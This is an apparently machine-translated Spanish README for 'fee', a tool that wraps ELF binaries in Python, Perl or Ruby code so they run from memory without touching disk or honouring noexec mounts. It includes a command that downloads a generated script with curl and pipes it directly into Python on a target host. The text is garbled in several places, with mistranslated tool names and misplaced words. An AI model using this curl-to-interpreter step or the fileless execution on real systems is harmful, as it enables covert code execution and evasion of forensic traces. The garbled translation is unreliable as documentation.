
Este script de Python genera código interpretado que crea el ELF proporcionado como un archivo en la memoria y lo ejecuta (sin tmpfs).
Esto hace posible ejecutar archivos binarios sin dejar rastros en el disco.
Se explican las técnicas utilizadas para este fin. aquí.
Usando las opciones predeterminadas de cada intérprete, ejecute el binario usando fee
No escribe en el disco. Esto se puede hacer usando algo como strace
.
fee
También completamente ignorado y omitido. noexec
indicadores de instalación incluso si están configurados para /proc
.
Requisitos de objetivo
- Núcleo: 3.17 o superior (para
memfd_create
apoyo) - Intérpretes. Cualquiera de estos:
- pitón 2
- pitón 3
- Perla
- rubí
Instalar
Instálelo en su host usando el siguiente comando pixar:
$ pipx install fee
…o puntos regulares:
$ pip install --user fee
También puedes clonar este repositorio y ejecutar el script directamente.
uso
Uso básico: proporcione la ruta al archivo binario que desea eliminar:
$ fee /path/to/binary > output.py
Luego puedes canalizar esto a Python en el objetivo:
$ curl my.example.site/output.py | python
Para obtener más información, haga clic aquí.
Los tamiles están muy interesados en las áreas de ciberseguridad, proyectos OSINT y CTF. Actualmente, está investigando y publicando profundamente varias herramientas de seguridad, incluidos los tutoriales de Kali Linux, que son bastante fascinantes. Ver más publicaciones